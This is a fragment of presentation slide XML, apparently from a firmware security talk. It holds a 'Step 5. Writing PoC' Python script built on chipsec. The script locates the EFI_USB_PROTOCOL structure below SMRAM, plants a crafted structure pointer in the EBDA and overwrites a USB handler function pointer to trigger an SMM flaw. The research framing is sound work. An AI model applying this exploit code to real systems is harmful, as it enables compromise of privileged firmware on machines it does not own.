              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cs = chipsec.chipset.cs() cs.init(None, True, True)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>intr = Interrupts(cs)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SMRAM = cs.cpu.get_SMRAM()[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_read = cs.helper.read_physical_mem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write = cs.helper.write_physical_mem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_alloc = cs.helper.alloc_physical_mem</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># locate EFI_USB_PROTOCOL and usb_data in the memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for addr in xrange(SMRAM / PAGE_SIZE - 1, 0, -1):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>	if mem_read(addr * PAGE_SIZE, 4) == ‘USBP’:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>		usb_protocol = addr * PAGE_SIZE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>		usb_data = unpack(“&lt;Q”, mem_read(addr * PAGE_SIZE + 8, 8))[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Shape 616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>. Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Shape 617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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622" name="Shape 622"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638100" y="1567175"/>
            <a:ext cx="11124300" cy="495600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F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>assert usb_protocol != 0, “can’t find EFI_USB_PROTOCOL structure”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>assert usb_data != 0, “usb_data pointer is empty”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># prepare our structure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>struct_addr = mem_alloc(PAGE_SIZE, 0xffffffff)[1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write(struct_addr, PAGE_SIZE, ‘\x00’ * PAGE_SIZE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># clean the structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write(struct_addr + 0x0, 1, ‘\x2d’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># subfunction number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write(struct_addr + 0xb, 1, ‘\x10’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># arithmetic adjustment</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># save the pointer to the structure in the EBDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ebda_addr = unpack(‘&lt;H’, mem_read(0x40e, 2))[0] * 0x10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write(ebda_addr + 0x104, 4, pack(‘&lt;I’, struct_addr))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># replace the pointer in the usb_data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bad_ptr = 0xbaddad</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>func_offset = 0x78</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>mem_write(usb_data + func_offset, 8, pack(‘&lt;Q’, bad_ptr))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># allow to read the pointer from EBDA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>x = ord(mem_read(usb_data + 0x8, 1)) &amp; ~0x10 mem_write(usb_data + 0x8, 1, chr(x))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># stuck it!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
